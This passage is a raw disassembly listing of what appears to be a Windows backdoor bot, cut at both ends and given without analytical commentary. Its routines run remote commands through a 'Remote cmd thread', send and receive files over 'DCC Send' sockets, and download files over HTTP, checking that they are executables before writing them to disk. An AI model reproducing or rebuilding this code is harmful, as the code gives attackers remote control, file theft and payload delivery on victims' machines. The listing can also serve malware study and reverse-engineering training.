locret_401D6C: ; CODE XREF: sub_401D39+2E�j
leave
retn
sub_401D39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D6E proc near ; CODE XREF: sub_40A9CF+14A0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_401DA6
cmp [ebp+arg_4], 0
jnz short loc_401D8B
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401D8B: ; CODE XREF: sub_401D6E+16�j
push 0
push 0
push 0
push [ebp+arg_4]
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401DA6: ; CODE XREF: sub_401D6E+10�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_401DBC
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401DBC: ; CODE XREF: sub_401D6E+4A�j
cmp [ebp+arg_4], 0
jz short loc_401DD9
push 200h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
loc_401DD9: ; CODE XREF: sub_401D6E+52�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_405F67
pop ecx
pop ecx
push offset aRemoteCmdThrea ; "Remote cmd thread"
push 1
push [ebp+var_4]
push offset loc_401981
call sub_4095A4
add esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_401E0B
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401E0B: ; CODE XREF: sub_401D6E+99�j
push offset asc_418214 ; "\r\n"
push [ebp+arg_4]
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push [ebp+arg_4]
call sub_401D39
pop ecx
test eax, eax
jnz short locret_401E36
push offset aErrorWhileExec ; "Error while executing command."
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
locret_401E36: ; CODE XREF: sub_401D6E+18�j
; sub_401D6E+33�j ...
leave
retn
sub_401D6E endp
; ---------------------------------------------------------------------------
loc_401E38: ; DATA XREF: sub_4024F3+10B�o
push ebp
mov ebp, esp
sub esp, 604h
push 3D6h
push dword ptr [ebp+8]
lea eax, [ebp-5E0h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
lea eax, [ebp-5BBh]
push eax
call ds:dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp-5BBh]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp-5E4h], eax
cmp dword ptr [ebp-5E4h], 0
jnz short loc_401EA3
push dword ptr [ebp-5E0h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EA3: ; CODE XREF: .text:00401E8E�j
push 2710h
push 0
lea eax, [ebp-3B7h]
push eax
lea eax, [ebp-4B7h]
push eax
call sub_4050EA
add esp, 10h
mov [ebp-208h], eax
cmp dword ptr [ebp-208h], 0
jnz short loc_401EEE
push dword ptr [ebp-5E4h]
call sub_416B82 ; fclose
pop ecx
push dword ptr [ebp-5E0h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EEE: ; CODE XREF: .text:00401ECD�j
lea eax, [ebp-5DCh]
push eax
lea eax, [ebp-5BBh]
push eax
mov eax, [ebp-5E0h]
push dword ptr [eax]
push offset dword_418280
lea eax, [ebp-3ADh]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp-5E8h], eax
and dword ptr [ebp-204h], 0
loc_401F2A: ; CODE XREF: .text:loc_401FD8�j
push 0
push 200h
lea eax, [ebp-200h]
push eax
push dword ptr [ebp-208h]
call ds:dword_417248 ; recv
mov [ebp-5F0h], eax
cmp dword ptr [ebp-5F0h], 0
jz short loc_401F5F
cmp dword ptr [ebp-5F0h], 200h
jbe short loc_401F61
loc_401F5F: ; CODE XREF: .text:00401F51�j
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401F61: ; CODE XREF: .text:00401F5D�j
mov eax, [ebp-204h]
add eax, [ebp-5F0h]
mov [ebp-204h], eax
push dword ptr [ebp-204h]
call ds:dword_41724C ; htonl
mov [ebp-5F4h], eax
push 4
lea eax, [ebp-5F4h]
push eax
push dword ptr [ebp-208h]
call sub_4053BF
add esp, 0Ch
push dword ptr [ebp-5E4h]
push dword ptr [ebp-5F0h]
push 1
lea eax, [ebp-200h]
push eax
call sub_416B7C ; fwrite
add esp, 10h
cmp dword ptr [ebp-5F0h], 200h
jnb short loc_401FC7
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401FC7: ; CODE XREF: .text:00401FC3�j
mov eax, [ebp-5E0h]
cmp dword ptr [eax+4], 0
jz short loc_401FD8
jmp loc_4020BC
; ---------------------------------------------------------------------------
loc_401FD8: ; CODE XREF: .text:00401FD1�j
jmp loc_401F2A
; ---------------------------------------------------------------------------
loc_401FDD: ; CODE XREF: .text:loc_401F5F�j
; .text:00401FC5�j
push dword ptr [ebp-5E4h]
call sub_416B76 ; ftell
pop ecx
mov [ebp-5ECh], eax
call sub_416B64 ; clock
cmp [ebp-5E8h], eax
jnz short loc_402008
call sub_416B64 ; clock
dec eax
mov [ebp-5E8h], eax
loc_402008: ; CODE XREF: .text:00401FFA�j
mov eax, [ebp-5ECh]
cdq
mov ecx, 400h
idiv ecx
mov [ebp-5F8h], eax
fild dword ptr [ebp-5F8h]
fstp dword ptr [ebp-5FCh]
call sub_416B64 ; clock
sub eax, [ebp-5E8h]
mov [ebp-600h], eax
fild dword ptr [ebp-600h]
fdiv ds:flt_417270
fdivr dword ptr [ebp-5FCh]
push ecx
push ecx
fstp qword ptr [esp]
call sub_416B64 ; clock
sub eax, [ebp-5E8h]
mov [ebp-604h], eax
fild dword ptr [ebp-604h]
fdiv ds:flt_417270
push ecx
push ecx
fstp qword ptr [esp]
lea eax, [ebp-5DCh]
push eax
lea eax, [ebp-5BBh]
push eax
push offset dword_418234
lea eax, [ebp-3ADh]
push eax
call sub_40D53F
add esp, 20h
loc_402094: ; CODE XREF: .text:loc_4020BC�j
push dword ptr [ebp-5E4h]
call sub_416B82 ; fclose
pop ecx
push dword ptr [ebp-208h]
call sub_40538D
pop ecx
push dword ptr [ebp-5E0h]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4020BE
; ---------------------------------------------------------------------------
loc_4020BC: ; CODE XREF: .text:00401FD3�j
jmp short loc_402094
; ---------------------------------------------------------------------------
locret_4020BE: ; CODE XREF: .text:00401E9E�j
; .text:00401EE9�j ...
leave
retn 4
; ---------------------------------------------------------------------------
loc_4020C2: ; DATA XREF: sub_40260D+7C�o
push ebp
mov ebp, esp
sub esp, 0A1Ch
push 2CCh
push dword ptr [ebp+8]
lea eax, [ebp-8E4h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
lea eax, [ebp-8BFh]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp-9F8h], eax
jmp short loc_40210D
; ---------------------------------------------------------------------------
loc_402100: ; CODE XREF: .text:loc_40215E�j
mov eax, [ebp-9F8h]
dec eax
mov [ebp-9F8h], eax
loc_40210D: ; CODE XREF: .text:004020FE�j
cmp dword ptr [ebp-9F8h], 0
jnz short loc_40212D
lea eax, [ebp-8BFh]
push eax
lea eax, [ebp-9F0h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40212D: ; CODE XREF: .text:00402114�j
mov eax, [ebp-9F8h]
movsx eax, byte ptr [ebp+eax-8BFh]
cmp eax, 5Ch
jnz short loc_40215E
mov eax, [ebp-9F8h]
lea eax, [ebp+eax-8BEh]
push eax
lea eax, [ebp-9F0h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40215E: ; CODE XREF: .text:0040213E�j
jmp short loc_402100
; ---------------------------------------------------------------------------
loc_402160: ; CODE XREF: .text:0040212B�j
; .text:0040215C�j
mov dword ptr [ebp-8E8h], 10h
lea eax, [ebp-8E8h]
push eax
lea eax, [ebp-10h]
push eax
call sub_40CF25
push eax
call ds:dword_417240 ; getsockname
push 2
push 0
push 0
push 401h
lea eax, [ebp-614h]
push eax
push dword ptr [ebp-8E8h]
lea eax, [ebp-10h]
push eax
call dword_41DE88 ; getnameinfo
test eax, eax
jz short loc_4021BA
push dword ptr [ebp-8E4h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_4021BA: ; CODE XREF: .text:004021A5�j
push 0Ah
lea eax, [ebp-0A04h]
push eax
push 1388h
push 400h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
lea eax, [ebp-0A04h]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp-9FCh], eax
cmp dword ptr [ebp-9FCh], 0
jnz short loc_40220F
push dword ptr [ebp-8E4h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40220F: ; CODE XREF: .text:004021FA�j
push offset aRb ; "rb"
lea eax, [ebp-8BFh]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp-8ECh], eax
cmp dword ptr [ebp-8ECh], 0
jnz short loc_402250
push dword ptr [ebp-9FCh]
call sub_404CBB
pop ecx
push dword ptr [ebp-8E4h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_402250: ; CODE XREF: .text:0040222F�j
push 2
push 0
push dword ptr [ebp-8ECh]
call sub_416B96 ; fseek
add esp, 0Ch
push dword ptr [ebp-8ECh]
call sub_416B76 ; ftell
pop ecx
mov [ebp-0A08h], eax
push 0
push 0
push dword ptr [ebp-8ECh]
call sub_416B96 ; fseek
add esp, 0Ch
lea eax, [ebp-614h]
push eax
lea eax, [ebp-9F0h]
push eax
push offset aDccSendSS ; "DCC Send %s (%s)"
lea eax, [ebp-8E0h]
push eax
call sub_40D420
add esp, 10h
push dword ptr [ebp-0A08h]
lea eax, [ebp-0A04h]
push eax
lea eax, [ebp-614h]
push eax
call ds:dword_417244 ; inet_addr
push eax
call ds:dword_41724C ; htonl
push eax
lea eax, [ebp-9F0h]
push eax
push offset dword_418348
lea eax, [ebp-8E0h]
push eax
call sub_40D4AB
add esp, 18h
push 0EA60h
push dword ptr [ebp-9FCh]
call sub_4048EF
pop ecx
pop ecx
mov [ebp-618h], eax
cmp dword ptr [ebp-618h], 0
jz short loc_40230F
cmp dword ptr [ebp-618h], 0FFFFFFFFh
jnz short loc_40233A
loc_40230F: ; CODE XREF: .text:00402304�j
push dword ptr [ebp-8ECh]
call sub_416B82 ; fclose
pop ecx
push dword ptr [ebp-9FCh]
call sub_404CBB
pop ecx
push dword ptr [ebp-8E4h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40233A: ; CODE XREF: .text:0040230D�j
lea eax, [ebp-8E0h]
push eax
lea eax, [ebp-9F0h]
push eax
mov eax, [ebp-8E4h]
push dword ptr [eax]
push offset dword_418320
lea eax, [ebp-7BBh]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp-9F4h], eax
loc_40236F: ; CODE XREF: .text:loc_40240D�j
push dword ptr [ebp-8ECh]
push 200h
push 1
lea eax, [ebp-210h]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp-0A0Ch], eax
cmp dword ptr [ebp-0A0Ch], 0
jz short loc_4023A6
cmp dword ptr [ebp-0A0Ch], 200h
jbe short loc_4023A8
loc_4023A6: ; CODE XREF: .text:00402398�j
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023A8: ; CODE XREF: .text:004023A4�j
push dword ptr [ebp-0A0Ch]
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-618h]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4023EE
lea eax, [ebp-8E0h]
push eax
lea eax, [ebp-9F0h]
push eax
push offset dword_4182F4
lea eax, [ebp-7BBh]
push eax
call sub_40D53F
add esp, 10h
jmp loc_4024ED
; ---------------------------------------------------------------------------
loc_4023EE: ; CODE XREF: .text:004023C5�j
cmp dword ptr [ebp-0A0Ch], 200h
jnb short loc_4023FC
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023FC: ; CODE XREF: .text:004023F8�j
mov eax, [ebp-8E4h]
cmp dword ptr [eax+4], 0
jz short loc_40240D
jmp loc_4024EB
; ---------------------------------------------------------------------------
loc_40240D: ; CODE XREF: .text:00402406�j
jmp loc_40236F
; ---------------------------------------------------------------------------
loc_402412: ; CODE XREF: .text:loc_4023A6�j
; .text:004023FA�j
call sub_416B64 ; clock
cmp [ebp-9F4h], eax
jnz short loc_40242B
call sub_416B64 ; clock
dec eax
mov [ebp-9F4h], eax
loc_40242B: ; CODE XREF: .text:0040241D�j
mov eax, [ebp-0A08h]
cdq
mov ecx, 400h
idiv ecx
mov [ebp-0A10h], eax
fild dword ptr [ebp-0A10h]
fstp dword ptr [ebp-0A14h]
call sub_416B64 ; clock
sub eax, [ebp-9F4h]
mov [ebp-0A18h], eax
fild dword ptr [ebp-0A18h]
fdiv ds:flt_417270
fdivr dword ptr [ebp-0A14h]
push ecx
push ecx
fstp qword ptr [esp]
call sub_416B64 ; clock
sub eax, [ebp-9F4h]
mov [ebp-0A1Ch], eax
fild dword ptr [ebp-0A1Ch]
fdiv ds:flt_417270
push ecx
push ecx
fstp qword ptr [esp]
lea eax, [ebp-8E0h]
push eax
lea eax, [ebp-9F0h]
push eax
push offset dword_4182B0
lea eax, [ebp-7BBh]
push eax
call sub_40D53F
add esp, 20h
loc_4024B7: ; CODE XREF: .text:loc_4024EB�j
; .text:loc_4024ED�j
push dword ptr [ebp-618h]
call sub_40538D
pop ecx
push dword ptr [ebp-8ECh]
call sub_416B82 ; fclose
pop ecx
push dword ptr [ebp-9FCh]
call sub_404CBB
pop ecx
push dword ptr [ebp-8E4h]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4024EF
; ---------------------------------------------------------------------------
loc_4024EB: ; CODE XREF: .text:00402408�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
loc_4024ED: ; CODE XREF: .text:004023E9�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
locret_4024EF: ; CODE XREF: .text:004021B5�j
; .text:0040220A�j ...
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024F3 proc near ; CODE XREF: sub_40D871+203�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_402511
cmp [ebp+arg_8], 0
jz short loc_402511
cmp [ebp+arg_C], 0
jz short loc_402511
cmp [ebp+arg_10], 0
jnz short loc_402516
loc_402511: ; CODE XREF: sub_4024F3+A�j
; sub_4024F3+10�j ...
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402516: ; CODE XREF: sub_4024F3+1C�j
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_402531
cmp [ebp+var_8], 0FFFFh
jbe short loc_402536
loc_402531: ; CODE XREF: sub_4024F3+33�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402536: ; CODE XREF: sub_4024F3+3C�j
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_402551
cmp [ebp+var_8], 40000000h
jbe short loc_402556
loc_402551: ; CODE XREF: sub_4024F3+53�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402556: ; CODE XREF: sub_4024F3+5C�j
push 3D6h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40256F
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_40256F: ; CODE XREF: sub_4024F3+75�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 100h
push [ebp+arg_C]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 6
push [ebp+arg_10]
mov eax, [ebp+var_4]
add eax, 229h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+22Fh], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 233h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_41837C
push 0
push [ebp+var_4]
push offset loc_401E38
call sub_4095A4
add esp, 18h
locret_40260B: ; CODE XREF: sub_4024F3:loc_402511�j
; sub_4024F3:loc_402531�j ...
leave
retn
sub_4024F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40260D proc near ; CODE XREF: sub_40A9CF+98E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jz short loc_40261D
cmp [ebp+arg_8], 0
jnz short loc_40261F
loc_40261D: ; CODE XREF: sub_40260D+8�j
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_40261F: ; CODE XREF: sub_40260D+E�j
push 2CCh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_402635
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_402635: ; CODE XREF: sub_40260D+24�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4183A0
push 0
push [ebp+var_4]
push offset loc_4020C2
call sub_4095A4
add esp, 18h
locret_402696: ; CODE XREF: sub_40260D:loc_40261D�j
; sub_40260D+26�j
leave
retn
sub_40260D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402698 proc near ; CODE XREF: .text:00402FFB�p
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 420h
push 2710h
push 0
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4050EA
add esp, 10h
mov [ebp+var_414], eax
cmp [ebp+var_414], 0
jnz short loc_4026CC
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4026CC: ; CODE XREF: sub_402698+2B�j
push [ebp+arg_8]
push [ebp+arg_10]
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 401h
lea eax, [ebp+var_404]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_404]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_4053BF
add esp, 0Ch
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402745
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_402758
loc_402745: ; CODE XREF: sub_402698+A2�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_402758: ; CODE XREF: sub_402698+AB�j
push offset asc_4183EC ; "\r\n\r\n"
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_40278D
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40278D: ; CODE XREF: sub_402698+E0�j
mov eax, [ebp+var_410]
add eax, 4
mov [ebp+var_410], eax
push offset aContentLength ; "Content-Length: "
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_40C], eax
cmp [ebp+var_40C], 0
jz short loc_4027CC
mov eax, [ebp+var_40C]
cmp eax, [ebp+var_410]
jbe short loc_4027DF
loc_4027CC: ; CODE XREF: sub_402698+124�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4027DF: ; CODE XREF: sub_402698+132�j
and [ebp+var_41C], 0
lea eax, [ebp+var_41C]
push eax
push offset aContentLengthU ; "Content-Length: %u\r\n"
push [ebp+var_40C]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_408], eax
cmp [ebp+var_408], 1
jnz short loc_402818
cmp [ebp+var_41C], 0
jnz short loc_40282B
loc_402818: ; CODE XREF: sub_402698+175�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40282B: ; CODE XREF: sub_402698+17E�j
cmp [ebp+arg_1C], 0
jz short loc_40285D
cmp [ebp+var_41C], 2
jb short loc_40284A
mov eax, [ebp+var_410]
movzx eax, word ptr [eax]
cmp eax, 5A4Dh
jz short loc_40285D
loc_40284A: ; CODE XREF: sub_402698+1A0�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40285D: ; CODE XREF: sub_402698+197�j
; sub_402698+1B0�j
cmp [ebp+arg_18], 0
jz short loc_40286E
mov eax, [ebp+arg_18]
mov ecx, [ebp+var_41C]
mov [eax], ecx
loc_40286E: ; CODE XREF: sub_402698+1C9�j
push [ebp+arg_14]
call sub_4167B9
pop ecx
test eax, eax
jz short loc_40288E
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40288E: ; CODE XREF: sub_402698+1E1�j
push offset dword_4182AC
push [ebp+arg_14]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 0
jnz short loc_4028BF
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4028BF: ; CODE XREF: sub_402698+212�j
push [ebp+var_418]
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
push ecx
push 1
push [ebp+var_410]
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
mov eax, [ebp+var_41C]
sub eax, ecx
mov [ebp+var_41C], eax
loc_402910: ; CODE XREF: sub_402698:loc_402A1D�j
cmp [ebp+arg_20], 0
jz short loc_40293F
mov eax, [ebp+arg_20]
cmp dword ptr [eax+4], 0
jz short loc_40293F
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40293F: ; CODE XREF: sub_402698+27C�j
; sub_402698+285�j
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402976
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_40299E
loc_402976: ; CODE XREF: sub_402698+2D3�j
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push [ebp+arg_14]
call ds:dword_4170AC ; DeleteFileA
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40299E: ; CODE XREF: sub_402698+2DC�j
mov eax, [ebp+var_420]
cmp eax, [ebp+var_41C]
jbe short loc_4029C8
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_4029C8: ; CODE XREF: sub_402698+312�j
push [ebp+var_418]
push [ebp+var_420]
push 1
lea eax, [ebp+var_404]
push eax
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_41C]
sub eax, [ebp+var_420]
mov [ebp+var_41C], eax
cmp [ebp+var_41C], 0
jnz short loc_402A1D
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_402A1D: ; CODE XREF: sub_402698+366�j
jmp loc_402910
; ---------------------------------------------------------------------------
locret_402A22: ; CODE XREF: sub_402698+2F�j
; sub_402698+BB�j ...
leave
retn
sub_402698 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A24 proc near ; CODE XREF: .text:00403057�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A2B proc near ; CODE XREF: .text:004030A5�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A2B endp
; ---------------------------------------------------------------------------
loc_402A32: ; DATA XREF: sub_403260+BC�o
push ebp
mov ebp, esp
sub esp, 804h
push edi
push 3AFh
push dword ptr [ebp+8]
lea eax, [ebp-63Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
lea eax, [ebp-638h]
push eax
lea eax, [ebp-7DCh]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
and dword ptr [ebp-288h], 0
mov dword ptr [ebp-28Ch], 1
and dword ptr [ebp-6CCh], 0
mov al, byte_41DE30
mov [ebp-284h], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp-283h]
rep stosd
stosw
stosb
mov al, byte_41DE30
mov [ebp-6BCh], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp-6BBh]
rep stosd
stosw
stosb
and dword ptr [ebp-6C8h], 0
lea eax, [ebp-534h]
push eax
lea eax, [ebp-7DCh]
push eax
mov eax, [ebp-63Ch]
push dword ptr [eax]
push offset dword_4185CC
lea eax, [ebp-430h]
push eax
call sub_40D53F
add esp, 14h
push 7
push offset aFile ; "file://"
lea eax, [ebp-638h]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_402B93
push 0
lea eax, [ebp-534h]
push eax
lea eax, [ebp-631h]
push eax
call ds:dword_417060 ; CopyFileA
test eax, eax
jnz short loc_402B8E
call ds:dword_417064 ; RtlGetLastWin32Error
cmp eax, 20h
jnz short loc_402B58
lea eax, [ebp-534h]
push eax
mov eax, [ebp-63Ch]
push dword ptr [eax]
push offset dword_41858C
lea eax, [ebp-430h]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_402B7B
; ---------------------------------------------------------------------------
loc_402B58: ; CODE XREF: .text:00402B31�j
lea eax, [ebp-631h]
push eax
mov eax, [ebp-63Ch]
push dword ptr [eax]
push offset dword_41855C
lea eax, [ebp-430h]
push eax
call sub_40D53F
add esp, 10h
loc_402B7B: ; CODE XREF: .text:00402B56�j
push dword ptr [ebp-63Ch]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402B8E: ; CODE XREF: .text:00402B26�j
jmp loc_403256
; ---------------------------------------------------------------------------
loc_402B93: ; CODE XREF: .text:00402B08�j
lea eax, [ebp-638h]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp-6C0h], eax
jmp short loc_402BB5
; ---------------------------------------------------------------------------
loc_402BA8: ; CODE XREF: .text:loc_402CD8�j
mov eax, [ebp-6C0h]
dec eax
mov [ebp-6C0h], eax
loc_402BB5: ; CODE XREF: .text:00402BA6�j
cmp dword ptr [ebp-6C0h], 0FFFFFFFFh
jz loc_402CDD
mov eax, [ebp-6C0h]
movsx eax, byte ptr [ebp+eax-638h]
cmp eax, 3Ah
jnz loc_402CD8
mov dword ptr [ebp-7E0h], 1
jmp short loc_402BF2
; ---------------------------------------------------------------------------
loc_402BE5: ; CODE XREF: .text:loc_402CD3�j
mov eax, [ebp-7E0h]
inc eax
mov [ebp-7E0h], eax
loc_402BF2: ; CODE XREF: .text:00402BE3�j
